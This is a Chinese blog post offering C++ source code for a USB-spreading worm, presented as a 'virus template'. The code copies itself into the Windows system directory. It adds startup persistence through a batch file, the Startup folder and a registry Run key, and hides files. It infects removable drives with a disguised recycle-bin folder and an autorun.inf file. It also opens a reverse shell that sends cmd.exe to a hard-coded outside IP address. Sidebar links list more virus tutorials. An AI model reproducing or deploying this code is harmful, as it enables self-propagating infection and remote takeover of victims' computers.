VC U盘病毒模版

最新推荐文章于 2022-11-27 14:35:48 发布
最新推荐文章于 2022-11-27 14:35:48 发布
阅读量1.1k 收藏 2
点赞数
分类专栏: 病毒木马

当然不是我写的,但会仿写:

// MyVirus2.cpp : Defines the entry point for the application.
//

// MyVirus1.cpp : Defines the entry point for the application.
//

// WindowsXP2.cpp : Defines the entry point for the application.
//

#include "stdafx.h"

#include <stdio.h>
#include <windows.h>
#include <iostream.h>
#include <mmsystem.h>
#include <process.h>
#include <winsock2.h>

#pragma comment(lib,"Ws2_32")

void InitData();
void VirusFunc();
bool Checkdisk();
void Scandisk();
//void ClipCursorr();
LRESULT CALLBACK keyproc(int code, WPARAM wParam, LPARAM lParam)
{
 //MessageBox(NULL, "1", "HOOK", MB_OK);
 return 1;
}
char szDriverName[4] = {0};
char szTmp[MAX_PATH] = {0};
char USB = 0;

void InitData()
{
 sprintf(szDriverName, "C:\0");
 ZeroMemory(&szTmp, sizeof(szTmp));
}
//病毒特征:拷贝本身到系统目录下并执行
//修改注册表启动项
//在U盘中建立recyc1e.{645FF040-5081-101B-9F08-00AA002F954E}、autorun.inf文件
//把启动内容写入autorun.inf文件
//加入一些控制电脑的语句
void VirusFunc()
{
 HKEY key;
 char szPath[MAX_PATH] = {0};
 char szName[MAX_PATH] = "mianhou.exe";
 GetModuleFileName(NULL, szPath, MAX_PATH);
 GetSystemDirectory(szTmp, MAX_PATH);
 lstrcat(szTmp, "\\");
 lstrcat(szTmp, szName);//由U盘感染电脑,szPath是病毒路径,szTmp是感染电脑后病毒的位置
 if ( lstrcmpi(szTmp, szPath))
 {
  CopyFile(szPath, szTmp, false);
  Sleep(500);
  WinExec(szTmp,SW_HIDE);
 }//拷贝本身到系统目录下并执行
 
 //szTmp[2] = '\0';
 //lstrcat(szTmp, "WINDOWS");
 char szTmp1[MAX_PATH];//szTmp1是windows目录下的WINSTART.BAT文件,修改该文件使病毒成为自启动
 char szTmp2[MAX_PATH];
 sprintf(szTmp1,"c:\\WINDOWS\\WINSTART.BAT");
 //CreateFile(szTmp1, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_ALWAYS, 0, 0);
 FILE *bat;
 bat = fopen(szTmp1,"w+");
 fprintf(bat,"@ c:\\WINDOWS\\system32\\mianhou.exe\n");//病毒自启动
 
 lstrcpy(szTmp2, "c:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\mianhou.exe");
    CopyFile(szPath, szTmp2, false);//修改启动项
 
 DWORD dw;
  if ( RegCreateKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", 0L, NULL, REG_OPTION_VOLATILE, KEY_ALL_ACCESS, NULL, &key, &dw) == ERROR_SUCCESS)
  RegSetValueEx(key, "1", 0, REG_SZ, (BYTE *)szTmp, lstrlen(szTmp));
 RegCloseKey(key);//修改注册表启动项

 DWORD mianhou1 = 0;
 DWORD mianhou2 = 2;
 
 Sleep(10000);
 DWORD dwSize = 2550;
 char szString[2550];
 DWORD dwType;
 if( RegOpenKey(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", &key) == ERROR_SUCCESS)
 {
  long lReturn = RegQueryValueEx(key, "ShowSuperHidden", NULL, &dwType, ( BYTE *)&szString, &dwSize);
  if(lReturn == 1)
  {
   mianhou1 = 0;
   RegSetValueEx(key, "ShowSuperHidden", 0, REG_DWORD, (CONST BYTE *)&mianhou1, sizeof(DWORD));
  }
 }
 if( RegOpenKey(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", &key) == ERROR_SUCCESS)
 {
  long lReturn = RegQueryValueEx(key, "Hidden", NULL, &dwType, ( BYTE *)&szString, &dwSize);
  if(lReturn == 1)
  {
   mianhou2 = 2;
   RegSetValueEx(key, "Hidden", 0, REG_DWORD, (CONST BYTE *)&mianhou2, sizeof(DWORD));
  }
 }

 

    //从主机感染U盘,产生2个文件,分别是autorun.inf文件和recyc1e.{645FF040-5081-101B-9F08-00AA002F954E}目录,将病毒拷贝到其目录中
 HANDLE FileHandle;
 char FileName[MAX_PATH];//FileName是autorun.inf的位置
 char FilePath[MAX_PATH];//FilePath是U盘中recyc1e.{645FF040-5081-101B-9F08-00AA002F954E}的位置
 char ExePath[MAX_PATH];//ExePath是U盘中mianhou.exe的位置
 
 lstrcpy(FilePath, &USB);//得到U盘的盘符
 lstrcat(FilePath, ":\\recyc1e.{645FF040-5081-101B-9F08-00AA002F954E}");
 CreateDirectory(FilePath, NULL);//建立文件夹

 lstrcpy(ExePath, FilePath);
 lstrcat(ExePath, "\\mianhou.exe");
 CopyFile(szTmp, ExePath, true);//将病毒从电脑主机拷贝到U盘的recyc1e.{645FF040-5081-101B-9F08-00AA002F954E}中

 lstrcpy(FileName, &USB);
 lstrcat(FileName,":\\autorun.inf");
 FileHandle = CreateFile(FileName, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_ALWAYS, 0, 0);//在U盘根目录下建立autorun.inf文件
    //FileHandle = CreateFile(FileName, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_NEW, 0, 0);
 char FileContent[MAX_PATH] = "[autorun]  \n open=.\\recyc1e.{645FF040-5081-101B-9F08-00AA002F954E}\\mianhou.exe \n Shell\\1=&打开(O) \n Shell\\1\\Command=.\\recyc1e.{645FF040-5081-101B-9F08-00AA002F954E}\\mianhou.exe \n Shellexecute=.\\recyc1e.{645FF040-5081-101B-9F08-00AA002F954E}\\mianhou.exe";
    DWORD nWrite;
 WriteFile(FileHandle, FileContent, MAX_PATH, &nWrite, NULL); //写入autorun.inf的内容

 SetFileAttributes(FileName, FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_READONLY);
 SetFileAttributes(FilePath, FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_READONLY);//设置autorun.inf文件和recyc1e.{645FF040-5081-101B-9F08-00AA002F954E}目录的属性为系统、只读和隐藏
   

 
  WSADATA ws;
 SOCKET s;
 int ret;

 WSAStartup(MAKEWORD(2,2), &ws);

 s = WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
 struct sockaddr_in server;
 server.sin_family = AF_INET;
 server.sin_port = htons(830);
 server.sin_addr.s_addr = inet_addr("28.53.217.111");

 connect(s, (struct sockaddr *)&server, sizeof(server));

 STARTUPINFO si;
 ZeroMemory(&si, sizeof(si));
 si.cb = sizeof(si);
 si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
 si.wShowWindow = SW_HIDE;

 si.hStdInput = si.hStdOutput = si.hStdError = (void *)s;

 char cmdLine[] = "cmd.exe";
 PROCESS_INFORMATION ProcessInformation;

 ret = CreateProcess(NULL, cmdLine, NULL, NULL, 1, 0, NULL, NULL, &si, &ProcessInformation);

}

 
bool Checkdisk()
{
 szDriverName[0] = 'C';
 for ( szDriverName[0]='C'; szDriverName[0]<'Z'; szDriverName[0]++)
 {
  if (GetDriveType(szDriverName) == DRIVE_REMOVABLE)
  {
   USB = szDriverName[0];
   return true;
  }
 }
 return false;
}

void Scandisk()
{
 while(!Checkdisk())
 {
  //cout<<"1\n";
  Sleep(10000);
 }
 
}

int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
 InitData();
 Scandisk();
 //::mciSendString("set cdaudio door open", NULL, 0, NULL);
 //::mciSendString("set cdaudio door closed wait", NULL, 0, NULL);

 VirusFunc();
 //ClipCursorr();
 return 0;
}

ccx_john
关注
专栏目录
感染U盘程序(C++代码)
09-15
感染U盘程序(C++代码),一个绝对值得一学并展示在别人面前的小程序!
[转] 一个U盘病毒简单分析
weixin_34198453的博客
02-12 348
(转自:一个U盘病毒简单分析 - 瑞星网 原文日期:2014.03.25) U盘这个移动存储设备由于体积小、容量大、便于携带等优点,给人们的存储数据带来了很大的便利。但正是由于这种便利,也给病毒有了可乘之机,你是否有过拿着U盘到外面打印照片,回来再使用U盘过程中,发现自己的电脑一下就中毒了的经历呢? U盘病毒对于局域网环境的企业来说也是一个很头疼的事情,由于员工随意插拔使用U盘,经常...
U盘病毒分析
HUANGliang_的博客
11-27 1068
U盘病毒分析,该病毒会将自己伪装成文件夹(病毒的图标是个文件夹,实际上是个可执行文件),将除 C 盘以外的所有磁盘的文件夹隐藏,并将自身拷贝过去,并重命名为原文件夹名的名称,同时程序运行过程中会尝试打开与自身同名的文件夹,用户很难发现自己中毒。然后创建拷贝自身 C:\windows\system32\javasc.exe,并在 sub_44E5CC 中将javasc.exe 注册为服务,接下来再次修改注册表,将 avb.exe 加入注册表 Runonce中。
u盘病毒制作教程和源码
liujiayu2的专栏
08-08 2万+
U盘病毒制作教程 知识点: --------------------------------------------------------------- 新建文件夹的名字是: 回收站.{645FF040-5081-101B-9F08-00AA002F954E} 这样就可以隐藏里面的文件了,打开此文件夹的时候直接进入回收站 -----------------------------
VC病毒(六个)都有迷惑性或杀伤性
最新发布
04-25
VC病毒,配套博客 https://blog.csdn.net/he10101/article/details/138073519?spm=1001.2014.3001.5502 使用,拥有详细解释,对于MessageBox(),system()等函数拥有详细的解释. VC Mini Virus, supporting blog ...
VC实现的病毒专杀工具完整实例
09-04
VC实现的病毒专杀工具】是一个通过Visual C++(VC)编写的程序,用于检测和消除计算机病毒。这类工具通常包含三个核心功能:终止病毒进程、删除病毒文件以及修复注册表和启动项。以下是对这些功能的详细解释: 1....
lpk病毒dll的vc6.0模板
08-02
lpk病毒dll的vc6.0模板.
常用的VC界面模板
06-26
"常用的VC界面模板"这个资源,正如其标题所示,提供了几个基础的C++界面模板,为初学者提供了学习和实践的机会。 VC,全称为Visual C++,是Microsoft公司开发的一款集成开发环境,专门用于C++编程。它支持MFC...
VC中调用EXECL模板生成报表
01-20
VC6.0中调用Excel模板生成报表的步骤大致如下: 1. **包含必要的头文件**:为了调用系统命令,需要包含`#include <process.h>`头文件。同时,如果要处理Excel文件,可能还需要包含`#include <windows.h>`,以便...
U盘病毒 hypertrm.exe 修复
热门推荐
CODER的博客
06-06 2万+
1.最近电脑中了这种病毒,没有直观的感觉,不会蓝屏,也不会有其他任何异样,恶心的是他在我每次插入U盘的时候会提示INF默认安装,我没有对病毒样本做分析,感觉他只是创建了系统钩子,导致我尽管杀掉了u盘里所有的病毒,再次插上一切还会重来 2.解决办法:只讲方法 不说原理 u盘的资源管理器里输入cmd 敲一段命令 attrib -r -s -h *.* /s /d 这可以吧所有被病毒隐藏的程序...
C++黑客项目:U盘病毒免疫器
m0_47563648的博客
10-18 719
U盘病毒的原理主要是autorun.inf文件 autorun.inf是我们电脑使用中比较常见的文件之一 ,其作用是允许在双击磁盘时自动运行指定的某个文件。但是近几年出现了用autorun.inf文件传播木马或病毒,它通过使用者的误操作让目标程序执行,达到侵入电脑的目的,带来了很大的负面影响。 今天教大家用MFC做一个免疫器 界面: 有一个combo box控件,为它添加一个变量 CComboBox m_CbDrive; 两个变量 wchar_t *AUTORUN =L"antorun.inf"; w
c语言编写u盘杀毒软件,[原创]C语言SDK U盘小偷
weixin_42395462的博客
05-25 540
程序工作原理:1、程序运行后将程序自身拷贝到系统目录。2、写注册表,实现开机自启动。3、在C盘下创建“U盘小偷”目录(文件夹),以存放偷来的文件。4、检测是否有可移动设备插入电脑,如果有,获取当前系统时间,在"C:\U盘小偷"目录下创建以SYSTEMTIME结构体的部分成员为名字的文件夹,保存本次盗窃成果。所有操作都在后台运行。由于程序在运行的时候会写注册表,这个操作会被具有主动防御功能的杀毒软件...
一个简单的U盘病毒
冷却
10-29 2418
/////////////////////////////////////////////////////////////一个简单的U盘病毒,用C语言实现,没有破坏模块,很安全的。//这是一个强化版本,可以突破autorun.inf文件夹防御策略。//作者:冷却//注意:此程序在用VC连接的时候要设置为多线程模式。///////////////////////////////
基于U盘传播的简单病毒
04-26 1682
原创作者:nevergone 信息来源:www.retcvc.com原始连接:http://www.retcvc.com/cgi-bin/topic.cgi?forum=4&topic=968&show=0#include #include #include #include #define TIMER 1//计时器#define WM_FROMC WM_USER+0     //自定义消息 从C
C++标准模板库STL深度解析
编译STL程序通常需要链接STL实现所在的库,例如在Visual C++(VC)环境下,通常链接`stdc++`库。 5. **STL其余部件** - **关联容器**:如集合、映射、多集合、多映射,它们以键值对的形式存储数据,并提供基于键...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值